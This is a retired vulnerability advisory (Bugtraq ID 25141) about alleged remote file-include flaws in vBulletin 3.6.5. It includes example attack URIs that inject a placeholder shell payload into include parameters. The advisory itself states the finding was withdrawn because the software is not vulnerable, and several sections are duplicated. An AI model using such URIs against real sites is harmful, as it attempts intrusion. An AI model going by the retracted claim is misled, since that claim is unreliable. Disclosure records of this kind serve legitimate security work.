RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
BID:25141
Info
RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 25141 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4120 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2007 12:00AM |
| Updated: | May 12 2015 07:49PM |
| Credit: | Hasadya Raed is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
VBulletin VBulletin 3.6.5 |
| Not Vulnerable: | |
Discussion
RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
vBulletin is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
vBulletin 3.6.5 is vulnerable; other versions may also be affected.
NOTE: This BID is being retired because further investigation has revealed that the application is not vulnerable to this issue.
vBulletin is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
vBulletin 3.6.5 is vulnerable; other versions may also be affected.
NOTE: This BID is being retired because further investigation has revealed that the application is not vulnerable to this issue.
Exploit / POC
RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
These issues may be triggered using a browser.
Example URIs have been provided:
http://www.example.com/vb/includes/functions.php?classfile=[Shell-Attack]
http://www.example.com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
http://www.example.com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
These issues may be triggered using a browser.
Example URIs have been provided:
http://www.example.com/vb/includes/functions.php?classfile=[Shell-Attack]
http://www.example.com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
http://www.example.com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
Solution / Fix
RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
References:
References: